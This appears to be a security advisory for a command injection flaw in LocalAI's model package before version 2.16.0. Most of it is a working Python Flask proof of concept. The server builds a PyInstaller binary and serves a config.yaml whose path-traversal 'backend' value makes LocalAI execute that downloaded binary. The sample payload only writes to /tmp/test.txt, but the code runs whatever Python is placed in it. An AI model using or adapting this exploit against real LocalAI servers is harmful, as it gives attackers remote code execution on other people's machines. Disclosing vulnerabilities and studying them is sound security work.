Command Injection Affecting github.com/mudler/localai/pkg/model package, versions <2.16.0

Affected versions of this package are vulnerable to Command Injection due to the backend parameter in the configuration file received from the user being used in the name of the initialized procress, when a model is created. The attacker can run code on the system by adding the path of the vulnerable binary file.

from flask import Flask,send_file,request
import tempfile
import PyInstaller.__main__
import os
import hashlib

app=Flask(__name__)

CONF="""name: "ptest"
backend: ../../../../../../../../../build/models/{0}
parameters:
  model: {1}app.bin

usage: |
    You can test this model with curl like this:

    test
"""

# Builds exploit code
def build():
    CODE = 'open("/tmp/test.txt","a").write("1337")' # Python code we want to run
    appname="app.bin"
    if os.path.isfile(appname):
        return appname
    with tempfile.NamedTemporaryFile(delete=False) as fp:
        fp.write(CODE.encode())
        fp.close()
        PyInstaller.__main__.run(["--onefile","--clean","--workpath","/tmp/build/","--specpath","/tmp","--distpath",".","-n",appname,fp.name])
    return appname

# localAI stores the application we built by renaming it. This name is the md5 of the url. Here this value is calculated
def calc_urlhash():
    url=request.root_url or ""
    url = url if url.endswith("/") else url+"/"
    return hashlib.md5((url + "app.bin").encode()).hexdigest() ,url

# Serve config.yaml file
@app.get("/config.yaml")
def config():
    hash,url=calc_urlhash()
    return CONF.format(hash,url)

# Serve app.bin file
@app.get("/app.bin")
def files():
    return send_file(build())


# Start the server
app.run("0.0.0.0",8000)

• GitHub Commit